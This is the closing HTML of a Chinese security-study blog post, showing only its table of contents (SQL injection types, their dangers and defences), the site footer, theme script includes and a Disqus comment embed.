              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#任务标题：Task-Titleweb-安全之手工测试之前编写的注入环境"><span class="nav-number">1.</span> <span class="nav-text">任务标题：Task Titleweb 安全之手工测试之前编写的注入环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#学习报告"><span class="nav-number">2.</span> <span class="nav-text">学习报告</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-不同类型的注入最后传递给Mysql的具体语句"><span class="nav-number">2.1.</span> <span class="nav-text">0x01 不同类型的注入最后传递给Mysql的具体语句</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-回显注入"><span class="nav-number">2.1.1.</span> <span class="nav-text">1. 回显注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-报错注入"><span class="nav-number">2.1.2.</span> <span class="nav-text">2. 报错注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-盲注"><span class="nav-number">2.1.3.</span> <span class="nav-text">3. 盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#时间盲注"><span class="nav-number">2.1.3.1.</span> <span class="nav-text">时间盲注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#布尔盲注"><span class="nav-number">2.1.3.2.</span> <span class="nav-text">布尔盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-宽字节注入"><span class="nav-number">2.1.4.</span> <span class="nav-text">4. 宽字节注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-总结"><span class="nav-number">2.1.5.</span> <span class="nav-text">5. 总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-注入漏洞的危害"><span class="nav-number">2.2.</span> <span class="nav-text">0x02 注入漏洞的危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-注入漏洞的防御"><span class="nav-number">2.3.</span> <span class="nav-text">0x03 注入漏洞的防御</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-代码方向"><span class="nav-number">2.3.1.</span> <span class="nav-text">1. 代码方向</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-服务器方向"><span class="nav-number">2.3.2.</span> <span class="nav-text">2. 服务器方向</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bu1</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">47.4k</span>
  
</div>


  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>"



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>-->




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/';
          this.page.identifier = '2021/01/06/第十一周：手工测试之前编写的注入环境/';
          this.page.title = '第十一周：手工测试之前编写的注入环境';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
